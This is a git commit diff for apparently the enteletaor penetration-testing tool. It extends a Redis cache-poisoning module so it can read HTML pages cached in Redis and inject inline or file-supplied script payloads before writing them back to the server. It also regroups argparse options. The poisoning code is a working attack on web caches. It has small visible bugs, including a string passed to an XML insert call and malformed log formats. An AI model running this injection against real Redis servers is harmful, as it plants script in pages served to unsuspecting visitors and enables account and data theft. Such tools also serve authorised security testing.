add - new options to inject into cache poisoning: payload from comand line, payload from file, complete new HTML file

add - some visual improvements in argparser
2016-02-18 11:11:59 +01:00
parent 8fb88f3a16
commit 0cf71412be
4 changed files with 179 additions and 103 deletions
--- a/enteletaor_lib/modules/proc/cmd_actions.py
+++ b/enteletaor_lib/modules/proc/cmd_actions.py
@@ -7,7 +7,9 @@ This file contains command line actions for argparser

 # ----------------------------------------------------------------------
 def parser_proc_raw_dump(parser):
-	parser.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
-	                    help="although all information be dumped do not stop")
-	parser.add_argument("-I", dest="interval", type=float, default=4,
-	                    help="timeout interval between tow connections")
+	gr = parser.add_argument_group("custom raw dump options")
+
+	gr.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
+	                help="although all information be dumped do not stop")
+	gr.add_argument("-I", dest="interval", type=float, default=4,
+	                help="timeout interval between tow connections")
--- a/enteletaor_lib/modules/redis/cmd_actions.py
+++ b/enteletaor_lib/modules/redis/cmd_actions.py
@@ -10,21 +10,33 @@ def parser_redis_dump(parser):
 	"""
 	Dump all redis database information
 	"""
-	parser.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
-	                    help="do not show displays raw database info into screen")
+	gr = parser.add_argument_group("custom raw dump options")
+	gr.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
+	                help="do not show displays raw database info into screen")


 # ----------------------------------------------------------------------
 def parser_redis_server_disconnect(parser):
-	parser.add_argument("-c", action="store", dest="client", help="user to disconnect")
-	parser.add_argument("--all", action="store_true", dest="disconnect_all", default=False,
-	                    help="disconnect all users")
+	gr = parser.add_argument_group("custom disconnect options")
+
+	gr.add_argument("-c", action="store", dest="client", help="user to disconnect")
+	gr.add_argument("--all", action="store_true", dest="disconnect_all", default=False,
+	                help="disconnect all users")


 # ----------------------------------------------------------------------
 def parser_redis_server_cache_poison(parser):
-	parser.add_argument("--search", action="store_true", dest="search_cache", default=False,
-	                    help="try to find cache info stored in Redis")
-	parser.add_argument("--cache-key", action="store", dest="cache_key",
-	                    help="try to poisoning using selected key")
+	gr = parser.add_argument_group("custom poison options")

+	gr.add_argument("--search", action="store_true", dest="search_cache", default=False,
+	                help="try to find cache info stored in Redis")
+	gr.add_argument("--cache-key", action="store", dest="cache_key",
+	                help="try to poisoning using selected key")
+
+	payload = parser.add_argument_group("payloads options")
+	payload.add_argument("--payload", action="store", dest="poison_payload",
+	                     help="try inject cmd inline payload")
+	payload.add_argument("--file-payload", action="store", dest="poison_payload_file",
+	                     help="try inject selected payload reading from a file")
+	payload.add_argument("--replace-html", action="store", dest="new_html",
+	                     help="replace cache content with selected file content")
--- a/enteletaor_lib/modules/redis/redis_poison.py
+++ b/enteletaor_lib/modules/redis/redis_poison.py
@@ -1,6 +1,5 @@
 # -*- coding: utf-8 -*-
-import binascii
-import six
+
 import redis
 import logging

@@ -50,7 +49,14 @@ def handle_html(config, content):
 	"""

 	# --------------------------------------------------------------------------
-	# Prepare info
+	# Selected custom HTML file?
+	# --------------------------------------------------------------------------
+	if config.new_html is not None:
+		with open(config.new_html, "rU") as f:
+			return f.read()
+
+	# --------------------------------------------------------------------------
+	# Search start and end possition of HTML page
 	# --------------------------------------------------------------------------
 	for i, x in enumerate(content):
 		if chr(x) == "<":
@@ -63,10 +69,7 @@ def handle_html(config, content):
 			break

 	if pos_ini is None or pos_end is None:
-		return None
-
-	# prefix = content[:pos_ini]
-	# suffix = content[pos_end:]
+		raise ValueError("Not found HTML content into cache")

 	txt_content = content[pos_ini:pos_end]

@@ -74,31 +77,39 @@ def handle_html(config, content):
 	tree = etree.fromstring(txt_content, etree.HTMLParser())
 	doc_root = tree.getroottree()

-	# Find an insert script injection
-	for point in ("title", "body"):
+	results = None
+
+	# Search insertion points
+	for point in ("head", "title", "body", "script", "div", "p"):
 		insert_point = doc_root.find(".//%s" % point)

 		if insert_point is None:
 			continue

-		# Add the injection
-		ss = etree.Element("script")
-		ss.text = "alert(1)"
+		# --------------------------------------------------------------------------
+		# Add the injection Payload
+		# --------------------------------------------------------------------------
+		if config.poison_payload_file is not None:
+			with open(config.poison_payload_file, "rU") as f:
+				_f_payload = f.read()
+			payload = etree.fromstring(_f_payload)

-		insert_point.addnext(ss)
+		elif config.poison_payload:
+			payload = etree.fromstring(config.poison_payload)
+		else:
+			payload = "<script>alert('You're broker injection vulnerable')</script>"
+
+		insert_point.addnext(payload)
+
+		# Set results
+		results = bytes(etree.tostring(doc_root))

-		# Found and insert point -> break
 		break

 	# --------------------------------------------------------------------------
-	# Fix results
+	# Build results
 	# --------------------------------------------------------------------------
-
-	# Result
-	# result = bytearray(prefix) + bytearray(etree.tostring(doc_root)) + bytearray(suffix)
-
-	return bytes(etree.tostring(doc_root))
-	# return bytes(result)
+	return results


 # ----------------------------------------------------------------------
@@ -120,7 +131,7 @@ def action_redis_cache_poison(config):
 			cache_keys = [config.cache_key]

 	# --------------------------------------------------------------------------
-	# Find caches
+	# Find cache keys
 	# --------------------------------------------------------------------------
 	if config.search_cache is True:
 		log.error("Looking for caches in '%s'..." % config.target)
@@ -146,15 +157,24 @@ def action_redis_cache_poison(config):
 			continue

 		# --------------------------------------------------------------------------
-		# Action over caches
+		# Make actions over cache
 		# --------------------------------------------------------------------------
-		# Modify
-		modified = handle_html(config, content)

+		# Set injection
+		try:
+			modified = handle_html(config, content)
+		except ValueError as e:
+			log.error("Can't modify cache content: " % e)
+			continue
+		except IOError as e:
+			log.error("Can't modify cache content: " % e)
+
+		# Injection was successful?
 		if modified is None:
-			log.warning("Can't modify content")
+			log.warning("Can't modify content: ensure that content is HTML")
+			continue

-		# Reset information
+		# Set injection into server
 		con.setex(val, 200, modified)